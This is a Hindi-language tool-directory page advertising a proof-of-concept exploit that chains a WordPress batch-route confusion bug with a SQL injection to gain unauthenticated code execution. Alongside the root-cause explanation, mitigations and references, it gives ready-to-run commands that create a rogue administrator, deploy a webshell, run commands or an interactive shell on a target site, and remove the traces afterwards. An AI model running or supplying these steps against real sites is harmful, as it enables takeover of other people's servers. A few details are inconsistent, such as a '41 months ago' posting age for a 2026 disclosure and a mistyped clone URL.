Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-63030-Wp2Shell — WordPress REST API SQLi से RCE PoC (CVE-2026-63030 और CVE-2026-60137) | Kitploit
उपकरण/GitHubGitHub/ghostinexile/cve-2026-63030-wp2shell
भेद्यता स्कैनरकोड विश्लेषणशोषणवेब सुरक्षापेपर और शोधलर्निंग और शिक्षा
GitHubghostinexile/cve-2026-63030-wp2shell

CVE-2026-63030-Wp2Shell

WordPress REST API SQLi से RCE PoC (CVE-2026-63030 और CVE-2026-60137)

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखेंवेबसाइट
41 महीना पहलेअभी तक समीक्षित नहीं

CVE-2026-63030 (wp2shell) — WordPress कोर प्री-प्रमाणीकरण RCE

REST API बैच रूट कन्फ्यूजन CVE-2026-60137 SQL इंजेक्शन के साथ जंजीर

CVE-2026-63030 CVE-2026-60137 aka wp2shell Status

TL;DR — एक अप्रमाणित हमलावर WordPress REST API बैच-रूटिंग बग को WP_Query में SQL इंजेक्शन के साथ जोड़कर एक सामान्य WordPress स्थापना पर पूर्ण दूरस्थ कोड निष्पादन (RCE) प्राप्त कर सकता है — बिना प्लगइन, बिना खाता, बिना उपयोगकर्ता इंटरैक्शन के। इसकी खोज Adam Kues (Assetnote / Searchlight Cyber) ने की, जिन्होंने इसे wp2shell नाम दिया। 6.9.5, 7.0.2, और 6.8.6 में 17 जुलाई, 2026 को पैच किया गया।

अवलोकन

CVE-2026-63030 WordPress Core के REST API बैच एंडपॉइंट (/wp-json/batch/v1) का एक त्रुटि प्रबंधन है जिसमें असफल उप-अनुरोधों को इस हद तक गलत तरीके से संभाला जाता है कि बाद का उप-अनुरोध गलत रूट पर भेज दिया जाता है। अपने आप में, यह एक तार्किक बग है। CVE-2026-60137 — WP_Query के author__not_in पैरामीटर में SQL इंजेक्शन — के साथ जंजीर होने पर यह अप्रमाणित दूरस्थ कोड निष्पादन बन जाता है।

WordPress CVE-2026-63030 को गंभीर और CVE-2026-60137 को उच्च दर्जा देता है; तृतीय-पक्ष CVSS अनुमान ट्रैकर के अनुसार भिन्न होते हैं (लगभग क्रमशः 7.5 और 9.1), क्योंकि कोई भी एकल स्कोर पूरी तरह से यह नहीं दर्शाता कि श्रृंखला क्या करती है। इसे गंभीर मानें, चाहे आपको कोई भी एकल संख्या दिखाई जाए — WordPress ने इसे इतना गंभीर माना कि प्रभावित प्रत्येक साइट पर स्वचालित अपडेट लागू कर दिया।

यह कैसे काम करता है

मूल कारण — बैच बुककीपिंग डिसिंक। जब बैच में कोई उप-अनुरोध सत्यापन में विफल होता है, तो परिणामी WP_Error को एक आंतरिक $validation[] सरणी में दर्ज किया जाता है — लेकिन रूटिंग के लिए उपयोग की जाने वाली समानांतर $matches[] सरणी को मिलान करने के लिए अपडेट नहीं किया जाता है। यह एक-आइटम अंतर प्रत्येक बाद के उप-अनुरोध को एक स्थान से स्थानांतरित कर देता है: उप-अनुरोध N उस रूट हैंडलर का उपयोग करके भेजा जाता है जो उप-अनुरोध N+1 के लिए अभिप्रेत था।

सैनिटाइज़ेशन बाईपास। जिस हैंडलर के तहत इसे कभी रूट नहीं किया गया था, उसके तहत चलने पर, उप-अनुरोध उस हैंडलर के स्वयं के इनपुट सत्यापन को छोड़ देता है — जिसमें प्रकार और is_array() जांच शामिल हैं।

SQL इंजेक्शन। वह अंतर हमलावर-नियंत्रित इनपुट को WP_Query के author__not_in पैरामीटर तक एक सरणी के बजाय कच्ची स्ट्रिंग के रूप में पहुंचने देता है। is_array() गार्ड जो सामान्यतः इसे अस्वीकार करता है, वह कभी नहीं चलता, इसलिए मान सीधे NOT IN (...) क्लॉज़ में अंतर्निहित हो जाता है।

समझौता करने का मार्ग। इंजेक्शन केवल SELECT है — कोई स्टैक्ड क्वेरी नहीं — लेकिन उन होस्टों पर जहां डेटाबेस उपयोगकर्ता के पास FILE विशेषाधिकार है, यह वेब रूट में PHP वेबशेल लिखने के लिए पर्याप्त है। जहां यह उपलब्ध नहीं है, वहां वही इंजेक्शन बिंदु इसके बजाय व्यवस्थापक पासवर्ड हैश के लिए wp_users तालिका को ब्लाइंड/UNION-डंप कर सकता है। किसी भी तरह: कोई खाता, कोई प्लगइन, कोई उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं है।

root@kitploit:~
sequenceDiagram
    participant A as Attacker
    participant B as Batch Handler
    participant Q as WP_Query
    participant D as MySQL
 
    A->>B: POST /wp-json/batch/v1 (crafted multi-request batch)
    Note over B: Failed sub-request recorded in one internal array but not the other — indexes drift by one
    B->>B: Sub-request N dispatched with sub-request N+1's route handler
    Note over B: Wrong handler context — that route's input validation never runs
    B->>Q: author__not_in passed as raw string, not array
    Note over Q: is_array() guard skipped
    Q->>D: SELECT ... WHERE post_author NOT IN (attacker string)
    alt DB user has FILE privilege
        D-->>A: Writes PHP webshell to web root → RCE
    else No FILE privilege
        D-->>A: Blind/UNION injection dumps admin password hashes
    end

उपयोग

  1. रिपॉजिटरी क्लोन करें
root@kitploit:~
git clone htttps://github.com/GhostInExile/CVE-2026-63030-Wp2Shell 
cd CVE-2026-63030-Wp2Shell
pip install -r requirements.txt
  1. भेद्यता का परीक्षण करें - बिना शोषण के लक्ष्य के भेद्यता की जांच करें:
root@kitploit:~
python3 CVE-2026-63030.py -t https://target.com --test
  1. व्यवस्थापक खाता बनाएं - SQL इंजेक्शन के माध्यम से एक नया WordPress व्यवस्थापक बनाएं:
root@kitploit:~
# Auto-generate credentials
python3 CVE-2026-63030.py -t https://target.com --create-admin

# Custom credentials
python3 CVE-2026-63030.py -t https://target.com --create-admin -u myadmin -p mypassword
  1. शेल कमांड निष्पादित करें - वेबशेल तैनात करें और कमांड निष्पादित करें:
root@kitploit:~
# Auto-create admin, deploy shell, execute single command
python3 CVE-2026-63030.py -t https://target.com --shell -c "whoami"

# Interactive shell mode
python3 CVE-2026-63030.py -t https://target.com --shell -i

# Use existing credentials
python3 CVE-2026-63030.py -t https://target.com --shell -U admin -P password -c "id"
  1. सफाई करें: बनाए गए संसाधनों को हटाएं (व्यवस्थापक उपयोगकर्ता और वेबशेल):
root@kitploit:~
# Cleanup after shell session
python3 CVE-2026-63030.py -t https://target.com --shell -c "whoami" --cleanup

# Cleanup only (requires shell URL from previous session)
python3 CVE-2026-63030.py -t https://target.com --cleanup \
  -U created_admin -P password \
  --shell-url "https://target.com/wp-content/plugins/maint-xxx/maint-xxx.php"
  1. अतिरिक्त विकल्प
root@kitploit:~
# Use proxy
python3 CVE-2026-63030.py -t https://target.com --test --proxy http://127.0.0.1:8080

# Custom timeout
python3 CVE-2026-63030.py -t https://target.com --test --timeout 60

प्रभावित संस्करण

  • RCE श्रृंखला के लिए दोनों बगों की आवश्यकता है, जो केवल 6.9.x और 7.0.x पर ओवरलैप होते हैं — यही कारण है कि 6.8 एक पैच भेजता है लेकिन उसे पूर्ण श्रृंखला का श्रेय कभी नहीं दिया गया।
  • Cloudflare के विश्लेषण के अनुसार, RCE पथ के लिए अतिरिक्त रूप से आवश्यक है कि साइट एक सतत ऑब्जेक्ट कैश का उपयोग नहीं कर रही है — एक सामान्य डिफ़ॉल्ट, लेकिन पैच स्थिति के बजाय वास्तविक जोखिम का आकलन करते समय जांचना उचित है।
  • GitHub सुरक्षा सलाहकार: GHSA-ff9f-jf42-662q (रूट कन्फ्यूजन) · GHSA-fpp7-x2x2-2mjf (SQLi)

खोज और समयरेखा

  • रूट कन्फ्यूजन / RCE श्रृंखला (CVE-2026-63030) — Assetnote / Searchlight Cyber के Adam Kues द्वारा WordPress के HackerOne कार्यक्रम के माध्यम से रिपोर्ट किया गया।
  • SQL इंजेक्शन (CVE-2026-60137) — TF1T, dtro, और haongo द्वारा एक टीम के रूप में अलग से रिपोर्ट किया गया।
  • 17 जुलाई, 2026 — WordPress ने आपातकालीन रिलीज़ 6.9.5 और 7.0.2 जारी कीं, 6.8.6 पर एक फिक्स बैकपोर्ट किया, और दोनों फिक्स 7.1 बीटा 2 में शामिल किए। Cloudflare ने सार्वजनिक प्रकटीकरण के पहले ही उसी दिन दोनों CVEs के लिए प्रबंधित WAF नियम तैनात किए।
  • प्रकटीकरण के बाद से — तकनीकी लेख और कम से कम एक सार्वजनिक प्रूफ-ऑफ-कॉन्सेप्ट (केवल डिटेक्शन, अपने स्वयं के दस्तावेज़ीकरण के अनुसार) प्रसारित हुए हैं। प्रकटीकरण के कुछ दिनों बाद तक जंगली में शोषण की पुष्टि रिपोर्ट नहीं की गई थी — इसे निपटारा मानने के बजाय वर्तमान खतरे की खुफिया जांच करें।

शमन

  1. तुरंत पैच करें 6.9.5, 7.0.2, 6.8.6 या बाद में — एकमात्र पूर्ण फिक्स। WordPress ने प्रभावित साइटों के लिए बलपूर्वक स्वचालित अपडेट सक्षम किए; यह मानने के बजाय पुष्टि करें कि आपका वास्तव में लागू हुआ।
  2. अभी पैच नहीं कर सकते? WAF/एज स्तर पर बैच एंडपॉइंट तक अप्रमाणित पहुंच को अवरुद्ध करें: /wp-json/batch/v1 और ?rest_route=/batch/v1 दोनों को ब्लॉक करें। केवल आपातकालीन उपाय — यह वैध बैच API उपयोग (जैसे ब्लॉक-आधारित संपादन) को तोड़ सकता है और पैचिंग का विकल्प नहीं है।
  3. प्रबंधित WAF नियम सक्षम करें यदि आपके प्रदाता ने उन्हें भेजा है। Cloudflare ने प्रकटीकरण के उसी दिन मुफ्त और सशुल्क योजनाओं में दोनों CVEs के लिए नियम तैनात किए।
  4. पैच करने के बाद, प्रकटीकरण विंडो (17 जुलाई, 2026 से आगे) के आसपास विकृत या असामान्य उप-अनुरोध पथों वाले बैच अनुरोधों के लिए एक्सेस लॉग की समीक्षा करें।

संदर्भ

  • WordPress 7.0.2 रिलीज़ घोषणा — https://wordpress.org/news/2026/07/wordpress-7-0-2-release/
  • GHSA-ff9f-jf42-662q (CVE-2026-63030) — https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662q
  • GHSA-fpp7-x2x2-2mjf (CVE-2026-60137) — https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-fpp7-x2x2-2mjf
  • Searchlight Cyber wp2shell सलाहकार — https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/
  • Cloudflare WAF कवरेज — https://blog.cloudflare.com/wordpress-vulnerabilities/
टूल डाउनलोड करें
WordPress संस्करणSQLi (CVE-2026-60137)रूट कन्फ्यूजन (CVE-2026-63030)वास्तविक दुनिया का जोखिम
< 6.8.0——प्रभावित नहीं
6.8.0 – 6.8.5✅—केवल SQLi — इसे author__not_in में अविश्वसनीय इनपुट पास करने के लिए प्लगइन/थीम की आवश्यकता है; अकेले कोर पर प्री-प्रमाणीकरण से पहुंच योग्य नहीं। फिर भी पैच करें।
6.9.0 – 6.9.4✅✅अप्रमाणित RCE
7.0.0 – 7.0.1✅✅अप्रमाणित RCE
7.1 बीटा 1✅✅अप्रमाणित RCE (बीटा चैनल)